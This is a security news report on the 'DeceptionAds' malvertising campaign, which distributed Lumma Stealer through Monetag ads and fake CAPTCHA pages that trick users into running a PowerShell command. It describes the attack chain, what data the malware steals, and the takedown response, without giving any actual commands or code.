A large-scale malvertising campaign has been discovered distributing the Lumma Stealer info-stealing malware through fake CAPTCHA verification pages.
The campaign, dubbed “DeceptionAds,” by Guardio Labs researchers, has been linked to a threat actor known as “Vane Viper.”
The campaign is believed to be a more sophisticated iteration of earlier “ClickFix” attacks, where victims were tricked into executing malicious PowerShell commands.
In the most recent operation, the attackers leveraged the legitimate advertising platform Monetag to distribute the malware at scale. The operation delivered over one million ad impressions per day across approximately 3,000 websites. Unlike previous campaigns that relied on phishing emails or malicious sites, DeceptionAds infiltrates legitimate online advertising to target unsuspecting users.
Typically, the malicious ads appear on pirate streaming platforms and websites hosting cracked software. When users click on these ads, obfuscated code verifies that they are humans (not bots) and then redirects them to a fake CAPTCHA verification page. The redirection occurs through the BeMob cloaking service, a tool generally used for legitimate ad performance tracking but here exploited for evasion purposes.
On the fake CAPTCHA page, victims are presented with instructions to “paste a CAPTCHA solution” into their Windows Run dialog, after which a hidden JavaScript snippet is copied a malicious one-line PowerShell command to the victim’s clipboard. When the user executes the PowerShell command, it triggers the download and execution of Lumma Stealer malware from a remote server.
Lumma Stealer is a highly advanced information-stealing malware that can siphon login credentials and passwords; browser cookies, history, and saved credit cards; cryptocurrency wallets and private keys; sensitive text files stored locally.
The stolen data is archived and sent back to the attacker’s server, where it can be used in follow-on attacks or sold on cybercrime marketplaces for profit.
Guardio Labs reported the large-scale abuse to Monetag and BeMob. Monetag removed 200 accounts linked to the threat actor within eight days, while BeMob shut down the malicious activity within four days. However, researchers observed signs of resurgence on December 11, as the attackers attempted to re-establish operations through a different ad network.